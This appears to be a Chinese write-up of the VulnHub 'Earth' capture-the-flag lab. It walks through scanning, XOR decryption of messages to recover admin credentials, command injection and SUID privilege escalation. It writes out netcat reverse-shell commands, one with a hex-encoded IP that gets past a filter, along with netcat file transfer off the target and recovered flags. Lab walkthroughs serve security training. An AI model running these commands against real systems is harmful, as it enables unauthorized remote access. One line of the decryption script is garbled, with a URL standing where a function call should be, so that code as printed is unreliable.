前言
靶機地址->>>vulnhub_Earth
攻擊機ip:192.168.20.121
靶機ip:192.168.20.122
參考文章
https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html
https://www.cnblogs.com/wthuskyblog/p/16032277.html
https://www.cnblogs.com/CHOSEN1-Z13/p/15915195.html
探測靶機
- 使用nmap掃描c段
nmap 192.168.20.0/24
點擊查看掃描結果
┌──(root?kali-purple)-[/home/kali]
└─# nmap 192.168.20.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 21:37 CST
Nmap scan report for 192.168.20.1
Host is up (0.00011s latency).
All 1000 scanned ports on 192.168.20.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.20.2
Host is up (0.00074s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:FE:42:C8 (VMware)
Nmap scan report for 192.168.20.122
Host is up (0.00041s latency).
Not shown: 983 filtered tcp ports (no-response), 14 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:29:AE:FF (VMware)
Nmap scan report for 192.168.20.254
Host is up (0.00018s latency).
All 1000 scanned ports on 192.168.20.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:F4:37:D0 (VMware)
Nmap scan report for 192.168.20.121
Host is up (0.0000020s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap done: 256 IP addresses (5 hosts up) scanned in 10.67 seconds
這里可以發現192.168.20.122為本次靶機開放了22,80埠以及443
- 使用-A引數查看完整靶機資訊
nmap -A 192.168.20.122 -p 22,80,443
點擊查看掃描結果
┌──(root?kali-purple)-[/home/kali]
└─# nmap -A 192.168.20.122 -p 22,80,443
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 21:44 CST
Nmap scan report for 192.168.20.122
Host is up (0.00047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
| tls-alpn:
|_ http/1.1
MAC Address: 00:0C:29:29:AE:FF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|specialized
Running (JUST GUESSING): Linux 5.X|4.X|3.X|2.6.X (98%), Synology DiskStation Manager 5.X (92%), Crestron 2-Series (90%)
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:crestron:2_series
Aggressive OS guesses: Linux 5.0 - 5.3 (98%), Linux 5.4 (98%), Linux 4.15 - 5.6 (97%), Linux 5.0 - 5.4 (96%), Linux 3.2 - 4.9 (94%), Linux 2.6.32 - 3.10 (93%), Linux 2.6.32 (92%), Linux 3.10 - 4.11 (92%), Synology DiskStation Manager 5.2-5644 (92%), Linux 2.6.32 - 3.13 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.20.122
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.67 seconds
這里可以發現80埠是400的一個狀態然后443埠做了dns
DNS:terratest.earth.local
網站資訊收集
- 更改hosts檔案,目錄為/etc/hosts
- 使用域名訪問網站
發現了3個key
點擊查看代碼
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
-
掃描網站目錄
-
使用dirsearch掃描
安裝命令如下
apt install dirsearch
運行
dirsearch -u terratest.earth.local/
點擊查看掃描結果
┌──(root?kali-purple)-[/home/kali/桌面]
└─# dirsearch -u terratest.earth.local/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/terratest.earth.local-_23-04-16_12-46-03.txt
Error Log: /root/.dirsearch/logs/errors-23-04-16_12-46-03.log
Target: http://terratest.earth.local/
[12:46:03] Starting:
[12:46:11] 301 - 0B - /admin -> /admin/
[12:46:11] 200 - 306B - /admin/
[12:46:11] 200 - 306B - /admin/?/login
[12:46:11] 200 - 746B - /admin/login
[12:46:18] 403 - 199B - /cgi-bin/
Task Completed
發現了網站后臺地址,/cgi-bin/我們是沒權限訪問的
- 查看網站后臺
手工嘗試爆破幾次發現不是常見弱口令
- dirb目錄掃描
點擊查看掃描結果
┌──(root?kali-purple)-[/home/kali/桌面]
└─# dirb https://terratest.earth.local/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 16 13:11:00 2023
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)
-----------------
END_TIME: Sun Apr 16 13:11:03 2023
DOWNLOADED: 4612 - FOUND: 3
查看robots.txt
這里可與i看到有一個不一樣的檔案 /testingnotes.* 但是不知道后綴 fuzz一下
- fuzz檔案后綴
使用dirbuster的字典就可以了,路徑如下
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt https://terratest.earth.local/testingnotes.FUZZ | grep "200"
這里可以看到結果為.txt,訪問一下
測驗安全訊息傳遞系統注意事項:
*使用 XOR 加密作為演算法,應該像在 RSA 中使用一樣安全,
*地球已確認他們已收到我們發送的訊息,
*測驗資料.txt用于測驗加密,
*Terra 用作管理門戶的用戶名,
待辦事項:
*我們如何安全地將每月密鑰發送到地球?還是我們應該每周更換密鑰?
*需要測驗不同的密鑰長度以防止暴力破解,密鑰應該有多長?
*需要改進訊息傳遞界面和管理面板的界面,目前非常基礎,
- 解密
不是很懂加密所以這一部分參考大佬博客,附上博客連接
Jing-X的博客
點擊查看代碼
import binascii
key1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
key2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
key3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
decode_txt = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
testdata = https://www.cnblogs.com/zy4024/archive/2023/04/19/binascii.b2a_hex(decode_txt).decode()
print(hex(int(key1,16) ^ int(testdata,16)))
print(hex(int(key2,16) ^ int(testdata,16)))
print(hex(int(key3,16) ^ int(testdata,16)))
將解密出來的16進制轉換一下
點擊查看解密結果
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's hisCfy //}omo;/ppeare'2~d;f$'x,jj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/jkr0~h<Pj1s.=i?q,<j${ugn$u6&*+o'erlj|mnn/?;-'1%,f{kx8.`b)"?p`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-skl)$In*'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky8/k<6=+1?*Ir8xo"P|7wfbn66??F?F嫧&2FF?W7F7F娦?プ"WfFV?V'Ff?B?B?&??V'2v?F|Rf'7B&??V'2?'Fw27F璂?fRV&VB|R暶??&Vv|?fV7BV'Fw2F?7W&R?7W&f6R?F?F?R&?&??g邧?Fr?2WvV#Cf2FFSvb6V7△??GG3痦6f'榢Cd禗?gF?G?6B?ff6WFFVR?G#?rFgg??cGGcgVFearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
earthclimatechangebad4humans這一段字串重復,實驗密碼
用戶名,查看urlhttp://terratest.earth.local/admin/login
可以發現這是terra的測驗,那么terra很有可能就是登錄的用戶名之一
賬號:terra
密碼:earthclimatechangebad4humans
漏洞發現及利用
發現漏洞
經過資訊收集我們成功進入到了網站后臺,在后臺中有一個命令執行的輸入框
可以發現權限很低
反彈shell
通過rce漏洞我們使用nc直接反彈shell到攻擊機上
nc -nv 192.168.20.128 6666 -c bash
kali開啟監聽
后續更換了kali_linux IP為192.168.20.128
起初以為是有埠限制后面參考了網上的wp發現是服務器段采用了正則對IP進行數字匹配
find / -name "*.py" -type f | xargs grep "Remote connections are forbidden"
cat /var/earth_web/secure_message/forms.py
將ip地址轉16進制即可反彈shell
點擊即可跳轉在線轉換工具
nc -nv 0Xc0a81480 6666 -c bash
查找flag
find / -name "*flag*"
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
SUID提權
find / -perm -u=s -type f 2>/dev/null
運行,發現報錯
使用nc將檔案傳遞回本地環境測驗
點擊查看代碼
nc 192.168.20.128 1234 < /usr/bin/reset_root
nc -lnvp 1234 >reset_root
要chmod 777 reset_root給他權限
然后strace reset_root進行除錯
運行之前安裝strace
apt install strace
strace ./reset_root
可以發現是缺少了這三個檔案
touch創建這三個檔案,再運行reset_root,發現將root密碼重置成了Earth:
點擊查看命令
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
提權完畢查看root目錄下的flag
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/550570.html
標籤:其他